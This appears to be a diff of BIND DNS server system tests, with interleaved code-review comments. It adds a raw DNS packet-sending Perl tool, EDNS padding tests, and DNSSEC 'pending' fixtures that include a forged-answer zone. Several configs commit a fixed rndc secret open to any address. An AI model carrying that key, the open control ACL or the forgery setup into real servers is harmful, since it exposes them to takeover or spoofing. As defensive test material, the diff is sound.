+ +require 5.006.001; + +use strict; +use Getopt::Std; +use IO::File; +use IO::Socket; + +sub usage { + print ("Usage: packet.pl [-a address] [-d] [-p port] [-t (tcp|udp)] [-r <repeats>] [file]\n"); + exit 1; +} + +my $sock; +my $proto; + +sub dumppacket { + use Net::DNS; + use Net::DNS::Packet; + + my $rin; + my $rout; + $rin = ''; + vec($rin, fileno($sock), 1) = 1; + select($rout = $rin, undef, undef, 1); + if (vec($rout, fileno($sock), 1)) { + my $buf; + + if ($proto eq "udp") { + $sock->recv($buf, 512); + } else { + my $n = $sock->sysread($buf, 2); + return unless $n == 2; + my $len = unpack("n", $buf); + $n = $sock->sysread($buf, $len); + return unless $n == $len; + } + + my $response; + if ($Net::DNS::VERSION > 0.68) { + $response = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($response, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + $response->print; + } +} + +my %options={}; +getopts("a:dp:t:r:", \%options); + +my $addr = "127.0.0.1"; +$addr = $options{a} if defined $options{a}; + +my $port = 53; +$port = $options{p} if defined $options{p}; + +$proto = "udp"; +$proto = lc $options{t} if defined $options{t}; +usage if ($proto !~ /^(udp|tcp)$/); + +my $repeats = 1; +$repeats = $options{r} if defined $options{r}; + +my $file = "STDIN"; +if (@ARGV >= 1) { + my $filename = shift @ARGV; + open FH, "<$filename" or die "$filename: $!"; + $file = "FH"; +} + +my $input = ""; +while (defined(my $line = <$file>) ) { + chomp $line; + $line =~ s/#.*$//; + $input .= $line; +} + +$input =~ s/\s+//g; +my $data = pack("H*", $input); +my $len = length $data; + +my $output = unpack("H*", $data); +print ("sending $repeats time(s): $output\n"); + +$sock = IO::Socket::INET->new(PeerAddr => $addr, PeerPort => $port, + Blocking => 0, + Proto => $proto,) or die "$!"; + +STDOUT->autoflush(1); + +my $bytes = 0; +while ($repeats > 0) { + if ($proto eq "udp") { + $bytes += $sock->send($data); + } else { + $bytes += 
$sock->syswrite(pack("n", $len), 2); + $bytes += $sock->syswrite($data, $len); + } + + $repeats = $repeats - 1; + + if ($repeats % 1000 == 0) { + print "."; + } +} + +$sock->shutdown(SHUT_WR); +if (defined $options{d}) { + dumppacket; +} + +$sock->close; +close $file; +print ("\nsent $bytes bytes to $addr:$port\n"); diff --git a/bin/tests/system/padding/clean.sh b/bin/tests/system/padding/clean.sh new file mode 100644 index 0000000..eef2174 --- /dev/null +++ b/bin/tests/system/padding/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out.* +rm -f ns*/named.memstats +rm -f ns*/named.run +rm -f ns*/named.stats +rm -f ns*/named.stats.prev +rm -f ns*/named.lock +rm -f ns*/named.conf +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/padding/ns1/named.conf.in b/bin/tests/system/padding/ns1/named.conf.in new file mode 100644 index 0000000..26cf4b3 --- /dev/null +++ b/bin/tests/system/padding/ns1/named.conf.in 
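Review bot: In packet.pl, `my %options={};` assigns a hash reference to a hash, which leaves one stringified-reference key in `%options` and draws Perl's "Reference found where even-sized list expected" warning when warnings are enabled; `my %options;` is all `getopts` needs. The input file is opened with the two-argument form `open FH, "<$filename"` on a bareword handle; `open(my $fh, '<', $filename) or die "$filename: $!";` keeps characters in the filename from being read as mode syntax, with the `$file = "FH"` indirection and the read loop adjusted to match. In the TCP branch, `pack("n", $len)` wraps for input longer than 65535 bytes and the `syswrite` results on the non-blocking socket are added to `$bytes` unchecked, so the final "sent $bytes bytes" line can misreport what reached the server. A `die` when `$len > 65535` with `-t tcp` would make the first case visible.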
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/padding/ns1/root.db b/bin/tests/system/padding/ns1/root.db
new file mode 100644
index 0000000..17780d1
--- /dev/null
+++ b/bin/tests/system/padding/ns1/root.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
diff --git a/bin/tests/system/padding/ns2/example.db b/bin/tests/system/padding/ns2/example.db
new file mode 100644
index 0000000..f6a4b03
--- /dev/null
+++ b/bin/tests/system/padding/ns2/example.db
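Review bot: The `controls` statement in padding/ns1/named.conf.in accepts rndc connections with `allow { any; }` and authenticates them only with the fixed secret committed in `key rndc_key`, and nothing in the file marks this as a test-only fixture. Because the secret is public, the listener is only as restricted as the 10.53.0.x loopback aliases it binds to, which is worth stating where the key is defined. I would add `/* test-only control key and ACL: safe only on the 10.53.0.x system-test addresses, never reuse elsewhere */` above `key rndc_key {`. The same key and `allow { any; }` appear in the ns2, ns3 and ns4 named.conf.in files of this test, which should carry the same comment.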
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ SOA ns2 hostmaster.isc.org. 1 600 600 1200 600
+@ NS ns2
+ns2 A 10.53.0.2
+foo A 10.53.1.1
diff --git a/bin/tests/system/padding/ns2/named.conf.in b/bin/tests/system/padding/ns2/named.conf.in
new file mode 100644
index 0000000..318f23a
--- /dev/null
+++ b/bin/tests/system/padding/ns2/named.conf.in
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ acache-enable yes;
+ send-cookie yes;
+ response-padding { !10.53.0.8; any; } block-size 64;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
diff --git a/bin/tests/system/padding/ns3/named.conf.in b/bin/tests/system/padding/ns3/named.conf.in
new file mode 100644
index 0000000..cf9434f
--- /dev/null
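Review bot: The `response-padding { !10.53.0.8; any; } block-size 64;` line in padding/ns2/named.conf.in has no comment explaining why 10.53.0.8 is excluded, although the test in tests.sh that queries with `-b 10.53.0.8` depends on exactly that entry. I would add `/* 10.53.0.8 is excluded so tests.sh can check that padding is filtered out by ACL */` above it, so the address is not removed or renumbered without the test. Separately, `acache-enable yes;` looks unrelated to padding; if that option is obsolete in this release it only produces a configuration warning and could be dropped, which is worth confirming.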
+++ b/bin/tests/system/padding/ns3/named.conf.in
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ directory ".";
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+};
+
+server 10.53.0.2 {
+ tcp-only yes;
+ padding 64;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/padding/ns4/named.conf.in b/bin/tests/system/padding/ns4/named.conf.in
new file mode 100644
index 0000000..9a1651e
--- /dev/null
+++ b/bin/tests/system/padding/ns4/named.conf.in
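Review bot: The `server 10.53.0.2 { tcp-only yes; padding 64; };` block in padding/ns3/named.conf.in is undocumented, and it differs from the ns4 file only in `tcp-only no;`, so the two configurations are easy to mistake for duplicates. Judging from tests.sh, ns3 is the positive case (the padding counter on ns2 must change) and ns4 the negative one (the counter must stay the same because padding is not sent without TCP). I would add `/* positive case: padding is sent to ns2 because queries go over TCP */` above the block here and `/* negative case: padding is configured but must not be sent over UDP */` above the one in ns4.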
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ directory ".";
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+};
+
+server 10.53.0.2 {
+ tcp-only no;
+ padding 64;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/padding/setup.sh b/bin/tests/system/padding/setup.sh
new file mode 100644
index 0000000..9e4f563
--- /dev/null
+++ b/bin/tests/system/padding/setup.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL ./clean.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+
+touch ns2/named.stats
diff --git a/bin/tests/system/padding/tests.sh b/bin/tests/system/padding/tests.sh
new file mode 100644
index 0000000..e50a5ab
--- /dev/null
+++ b/bin/tests/system/padding/tests.sh
@@ -0,0 +1,134 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+n=0
+status=0
+
+DIGOPTS="-p ${PORT}"
+RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s"
+
+getcookie() {
+ awk '$2 == "COOKIE:" {
+ print $3;
+ }' < $1
+}
+
+echo_i "checking that dig handles padding ($n)"
+ret=0
+n=`expr $n + 1`
+$DIG $DIGOPTS +qr +padding=128 foo.example @10.53.0.2 > dig.out.test$n
+grep "; PAD" dig.out.test$n > /dev/null || ret=1
+grep "; QUERY SIZE: 128" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking that dig added padding ($n)"
+ret=0
+n=`expr $n + 1`
+nextpart ns2/named.stats > /dev/null
+$RNDCCMD 10.53.0.2 stats
+wait_for_log_peek 5 "--- Statistics Dump ---" ns2/named.stats || ret=1
+nextpart ns2/named.stats | grep "EDNS padding option received" > /dev/null || ret=1
+
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking that padding is added for TCP responses ($n)"
+ret=0
+n=`expr $n + 1`
+$DIG $DIGOPTS +vc +padding=128 foo.example @10.53.0.2 > dig.out.test$n
+grep "; PAD" dig.out.test$n > /dev/null || ret=1
+grep "rcvd: 128" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking that padding is added to valid cookie responses ($n)"
+ret=0
+n=`expr $n + 1`
+$DIG $DIGOPTS +cookie foo.example @10.53.0.2 > dig.out.testc
+cookie=`getcookie dig.out.testc`
+$DIG $DIGOPTS +cookie=$cookie +padding=128 foo.example @10.53.0.2 > dig.out.test$n
+grep "; PAD" dig.out.test$n > /dev/null || ret=1
+grep "rcvd: 128" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking that padding must be requested (TCP) ($n)"
+ret=0
+n=`expr $n + 1`
+$DIG $DIGOPTS +vc foo.example @10.53.0.2 > dig.out.test$n
+grep "; PAD" dig.out.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking that padding must be requested (valid cookie) ($n)"
+ret=0
+n=`expr $n + 1`
+$DIG $DIGOPTS +cookie=$cookie foo.example @10.53.0.2 > dig.out.test$n
+grep "; PAD" dig.out.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking that padding can be filtered out ($n)"
+ret=0
+n=`expr $n + 1`
+$DIG $DIGOPTS +vc +padding=128 -b 10.53.0.8 foo.example @10.53.0.2 > dig.out.test$n
+grep "; PAD" dig.out.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking that a TCP and padding server config enables padding ($n)"
+ret=0
+n=`expr $n + 1`
+nextpart ns2/named.stats > /dev/null
+$RNDCCMD 10.53.0.2 stats
+wait_for_log_peek 5 "--- Statistics Dump ---" ns2/named.stats || ret=1
+opad=`nextpart ns2/named.stats | awk '/EDNS padding option received/ { print $1}'`
+$DIG $DIGOPTS foo.example @10.53.0.3 > dig.out.test$n
+$RNDCCMD 10.53.0.2 stats
+wait_for_log_peek 5 "--- Statistics Dump ---" ns2/named.stats || ret=1
+npad=`nextpart ns2/named.stats | awk '/EDNS padding option received/ { print $1}'`
+if [ "$opad" -eq "$npad" ]; then echo_i "error: opad ($opad) == npad ($npad)"; ret=1; fi
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking that a padding server config should enforce TCP ($n)"
+ret=0
+n=`expr $n + 1`
+nextpart ns2/named.stats > /dev/null
+$RNDCCMD 10.53.0.2 stats
+wait_for_log_peek 5 "--- Statistics Dump ---" ns2/named.stats || ret=1
+opad=`nextpart ns2/named.stats | awk '/EDNS padding option received/ { print $1}'`
+$DIG $DIGOPTS foo.example @10.53.0.4 > dig.out.test$n
+$RNDCCMD 10.53.0.2 stats
+wait_for_log_peek 5 "--- Statistics Dump ---" ns2/named.stats || ret=1
+npad=`nextpart ns2/named.stats | awk '/EDNS padding option received/ { print $1}'`
+if [ "$opad" -ne "$npad" ]; then echo_i "error: opad ($opad) != npad ($npad)"; ret=1; fi
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking that zero-length padding option has no effect ($n)"
+ret=0
+n=`expr $n + 1`
+$DIG $DIGOPTS +qr +ednsopt=12 foo.example @10.53.0.2 > dig.out.test$n.1
+grep "; PAD" dig.out.test$n.1 > /dev/null || ret=1
+$DIG $DIGOPTS +qr +ednsopt=12:00 foo.example @10.53.0.2 > dig.out.test$n.2
+grep "; PAD" dig.out.test$n.2 > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/parallel.sh b/bin/tests/system/parallel.sh
new file mode 100644
index 0000000..8d156cf
--- /dev/null
+++ b/bin/tests/system/parallel.sh
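Review bot: The three negative checks in padding/tests.sh ("padding must be requested (TCP)", "(valid cookie)" and "padding can be filtered out") only assert that `; PAD` is absent from the dig output, so they also pass when dig returned no answer at all, for example if `-b 10.53.0.8` cannot be bound or `getcookie` left `$cookie` empty. Each should first prove that a response arrived, by appending `|| ret=1` to the `$DIG` line and adding `grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1` before the `; PAD` check. The two counter comparisons have the same weakness: when `opad` or `npad` is empty, `[ "$opad" -eq "$npad" ]` (and the `-ne` form) errors out and the branch that sets `ret=1` is skipped. Adding `[ -n "$opad" ] && [ -n "$npad" ] || ret=1` before each comparison would make a missing statistic fail the test instead of passing it.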
@@ -0,0 +1,36 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+. ./conf.sh
+
+PARALLELS=`echo $PARALLELDIRS | sed "s|\([^ ][^ ]*\)|test-\1|g;" | tr _ -`
+
+echo ".PHONY: $PARALLELS"
+echo
+echo "check_interfaces:"
+echo " @${PERL} testsock.pl > /dev/null 2>&1 || { \\"
+echo " echo \"I:NOTE: System tests were skipped because they require the\"; \\"
+echo " echo \"I: test IP addresses 10.53.0.* to be configured as alias\"; \\"
+echo " echo \"I: addresses on the loopback interface. Please run\"; \\"
+echo " echo \"I: \"bin/tests/system/ifconfig.sh up\" as root to configure them.\"; \\"
+echo " exit 1; \\"
+echo " }"
+echo
+echo "test check: $PARALLELS"
+port=${STARTPORT:-5000}
+for directory in $PARALLELDIRS ; do
+ echo
+ echo "test-`echo $directory | tr _ -`: check_interfaces"
+ echo " @${SHELL} ./run.sh -p $port $directory 2>&1 | tee test.output.$directory"
+ port=`expr $port + 100`
+done
diff --git a/bin/tests/system/pending/clean.sh b/bin/tests/system/pending/clean.sh
new file mode 100644
index 0000000..89a4b5b
--- /dev/null
+++ b/bin/tests/system/pending/clean.sh
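Review bot: The recipe line generated inside the `for directory in $PARALLELDIRS` loop, `@${SHELL} ./run.sh -p $port $directory 2>&1 | tee test.output.$directory`, takes its exit status from `tee`, so under a plain POSIX shell a failing `run.sh` still leaves the `test-*` target successful. If the pass/fail result is collected from the `test.output.*` files by a later step, which this hunk does not show, that should be stated in a comment above the loop, e.g. `# exit status of run.sh is discarded by tee; results are read from test.output.*`. Otherwise the recipe should record the status of `run.sh` separately and exit with it after the pipeline, so that a failed security regression test cannot be reported as a green build.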
@@ -0,0 +1,27 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -rf */*.signed
+rm -rf */*.jnl
+rm -rf */K*
+rm -rf */dsset-*
+rm -rf */named.memstats
+rm -rf */named.run
+rm -rf */trusted.conf
+rm -rf ns1/root.db
+rm -rf ns2/example.db
+rm -rf ns2/example.com.db
+rm -rf nsupdate.out.test
+rm -f ns*/named.lock
+rm -f ns*/named.conf
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/pending/ns1/named.conf.in b/bin/tests/system/pending/ns1/named.conf.in
new file mode 100644
index 0000000..f09c3c9
--- /dev/null
+++ b/bin/tests/system/pending/ns1/named.conf.in
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "trusted.conf";
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+zone "." {
+ type primary;
+ file "root.db.signed";
+};
diff --git a/bin/tests/system/pending/ns1/root.db.in b/bin/tests/system/pending/ns1/root.db.in
new file mode 100644
index 0000000..fe7fe92
--- /dev/null
+++ b/bin/tests/system/pending/ns1/root.db.in
@@ -0,0 +1,29 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 30
+. IN SOA marka.isc.org. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+example.com. NS ns2.example.com.
+ns2.example.com. A 10.53.0.2
+hostile. NS ns3.hostile.
+ns3.hostile. A 10.53.0.3
+nice.good. A 10.10.10.10
diff --git a/bin/tests/system/pending/ns1/sign.sh b/bin/tests/system/pending/ns1/sign.sh
new file mode 100644
index 0000000..c29ebe2
--- /dev/null
+++ b/bin/tests/system/pending/ns1/sign.sh
@@ -0,0 +1,36 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=.
+infile=root.db.in
+zonefile=root.db
+
+(cd ../ns2 && $SHELL -e sign.sh )
+
+cp ../ns2/dsset-example$TP .
+cp ../ns2/dsset-example.com$TP .
+
+keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone)
+keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -f KSK -n zone $zone)
+cat $infile $keyname1.key $keyname2.key > $zonefile
+
+$SIGNER -g -o $zone $zonefile > /dev/null
+
+# Configure the resolving server with a static key.
+keyfile_to_static_ds $keyname2 > trusted.conf
+cp trusted.conf ../ns2/trusted.conf
+cp trusted.conf ../ns3/trusted.conf
+cp trusted.conf ../ns4/trusted.conf
diff --git a/bin/tests/system/pending/ns2/example.com.db.in b/bin/tests/system/pending/ns2/example.com.db.in
new file mode 100644
index 0000000..ee3a1b8
--- /dev/null
+++ b/bin/tests/system/pending/ns2/example.com.db.in
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 30
+@ IN SOA mname1. . (
+ 2009110300 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ MX 10 mail
+ns2 A 10.53.0.2
+mail A 192.0.2.2
+ AAAA 2001:db8::2
+pending-ok A 192.0.2.2
+pending-ng A 192.0.2.102
+removed A 10.9.8.7
diff --git a/bin/tests/system/pending/ns2/example.db.in b/bin/tests/system/pending/ns2/example.db.in
new file mode 100644
index 0000000..5b42e2a
--- /dev/null
+++ b/bin/tests/system/pending/ns2/example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 30
+$ORIGIN example.
+@ IN SOA mname1. . (
+ 2009110300 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ MX 10 mail
+ns2 A 10.53.0.2
+mail A 10.0.0.2
+bad CNAME nice.good.
+worse A 6.6.6.6
diff --git a/bin/tests/system/pending/ns2/forgery.db b/bin/tests/system/pending/ns2/forgery.db
new file mode 100644
index 0000000..fbf42bc
--- /dev/null
+++ b/bin/tests/system/pending/ns2/forgery.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 30
+$ORIGIN good.
+@ IN SOA mname1. . (
+ 2009110300 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
+
+nice.good. CNAME worse.example.
diff --git a/bin/tests/system/pending/ns2/named.conf.in b/bin/tests/system/pending/ns2/named.conf.in
new file mode 100644
index 0000000..59824df
--- /dev/null
+++ b/bin/tests/system/pending/ns2/named.conf.in
@@ -0,0 +1,51 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+include "trusted.conf";
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db.signed";
+};
+
+zone "example.com" {
+ type primary;
+ file "example.com.db.signed";
+ allow-update { 10.53.0.0/16; };
+};
+
+zone "good" {
+ type primary;
